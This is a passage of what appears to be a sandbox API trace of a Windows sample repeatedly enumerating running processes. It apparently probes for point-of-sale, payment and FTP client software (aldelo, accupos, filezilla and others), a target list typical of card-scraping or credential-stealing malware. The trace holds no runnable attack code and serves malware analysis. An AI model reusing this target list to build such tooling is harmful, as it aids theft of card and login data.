th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0161.030] Process32Next (in: hSnapshot=0x1b80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0161.033] Process32Next (in: hSnapshot=0x1b80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0161.039] Process32Next (in: hSnapshot=0x1b80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0161.042] Process32Next (in: hSnapshot=0x1b80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0161.045] Process32Next (in: hSnapshot=0x1b80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0161.047] Process32Next (in: hSnapshot=0x1b80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0161.050] Process32Next (in: hSnapshot=0x1b80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0161.052] Process32Next (in: hSnapshot=0x1b80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0161.055] Process32Next (in: hSnapshot=0x1b80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0161.058] Process32Next (in: hSnapshot=0x1b80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0161.061] Process32Next (in: hSnapshot=0x1b80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0161.063] Process32Next (in: hSnapshot=0x1b80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0161.066] Process32Next (in: hSnapshot=0x1b80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0161.069] Process32Next (in: hSnapshot=0x1b80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0161.071] Process32Next (in: hSnapshot=0x1b80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0161.074] Process32Next (in: hSnapshot=0x1b80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1398, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0161.084] Process32Next (in: hSnapshot=0x1b80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0161.086] Process32Next (in: hSnapshot=0x1b80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0161.088] Process32Next (in: hSnapshot=0x1b80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0161.090] Process32Next (in: hSnapshot=0x1b80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 0 [0161.091] CloseHandle (hObject=0x1b80) returned 1 [0161.092] Sleep (dwMilliseconds=0x64) [0161.194] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1df8 [0161.234] Process32First (in: hSnapshot=0x1df8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0161.236] Process32Next (in: hSnapshot=0x1df8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0161.238] Process32Next (in: hSnapshot=0x1df8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0161.240] Process32Next (in: hSnapshot=0x1df8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0161.243] Process32Next (in: hSnapshot=0x1df8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0161.245] Process32Next (in: hSnapshot=0x1df8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0161.247] Process32Next (in: hSnapshot=0x1df8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0161.249] Process32Next (in: hSnapshot=0x1df8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0161.251] Process32Next (in: hSnapshot=0x1df8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0161.253] Process32Next (in: hSnapshot=0x1df8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0161.307] Process32Next (in: hSnapshot=0x1df8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0161.309] Process32Next (in: hSnapshot=0x1df8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0161.311] Process32Next (in: hSnapshot=0x1df8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0161.313] Process32Next (in: hSnapshot=0x1df8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0161.314] Process32Next (in: hSnapshot=0x1df8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0161.316] Process32Next (in: hSnapshot=0x1df8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0161.317] Process32Next (in: hSnapshot=0x1df8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0161.322] Process32Next (in: hSnapshot=0x1df8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0161.324] Process32Next (in: hSnapshot=0x1df8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0161.326] Process32Next (in: hSnapshot=0x1df8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0161.327] Process32Next (in: hSnapshot=0x1df8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0161.329] Process32Next (in: hSnapshot=0x1df8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0161.331] Process32Next (in: hSnapshot=0x1df8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0161.332] Process32Next (in: hSnapshot=0x1df8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0161.334] Process32Next (in: hSnapshot=0x1df8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0161.336] Process32Next (in: hSnapshot=0x1df8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0161.337] Process32Next (in: hSnapshot=0x1df8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0161.339] Process32Next (in: hSnapshot=0x1df8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0161.340] Process32Next (in: hSnapshot=0x1df8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0161.342] Process32Next (in: hSnapshot=0x1df8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0161.344] Process32Next (in: hSnapshot=0x1df8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0161.387] Process32Next (in: hSnapshot=0x1df8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0161.389] Process32Next (in: hSnapshot=0x1df8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0161.390] Process32Next (in: hSnapshot=0x1df8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0161.392] Process32Next (in: hSnapshot=0x1df8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0161.394] Process32Next (in: hSnapshot=0x1df8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0161.396] Process32Next (in: hSnapshot=0x1df8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0161.398] Process32Next (in: hSnapshot=0x1df8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0161.400] Process32Next (in: hSnapshot=0x1df8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0161.401] Process32Next (in: hSnapshot=0x1df8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0161.403] Process32Next (in: hSnapshot=0x1df8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0161.405] Process32Next (in: hSnapshot=0x1df8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0161.406] Process32Next (in: hSnapshot=0x1df8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0161.423] Process32Next (in: hSnapshot=0x1df8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0161.427] Process32Next (in: hSnapshot=0x1df8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0161.429] Process32Next (in: hSnapshot=0x1df8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0161.430] Process32Next (in: hSnapshot=0x1df8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0161.432] Process32Next (in: hSnapshot=0x1df8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0161.433] Process32Next (in: hSnapshot=0x1df8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0161.435] Process32Next (in: hSnapshot=0x1df8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0161.495] Process32Next (in: hSnapshot=0x1df8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0161.497] Process32Next (in: hSnapshot=0x1df8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0161.499] Process32Next (in: hSnapshot=0x1df8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0161.501] Process32Next (in: hSnapshot=0x1df8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0161.503] Process32Next (in: hSnapshot=0x1df8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0161.504] Process32Next (in: hSnapshot=0x1df8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0161.506] Process32Next (in: hSnapshot=0x1df8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0161.507] Process32Next (in: hSnapshot=0x1df8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0161.509] Process32Next (in: hSnapshot=0x1df8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0161.512] Process32Next (in: hSnapshot=0x1df8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0161.514] Process32Next (in: hSnapshot=0x1df8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0161.516] Process32Next (in: hSnapshot=0x1df8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0161.519] Process32Next (in: hSnapshot=0x1df8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0161.521] Process32Next (in: hSnapshot=0x1df8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, 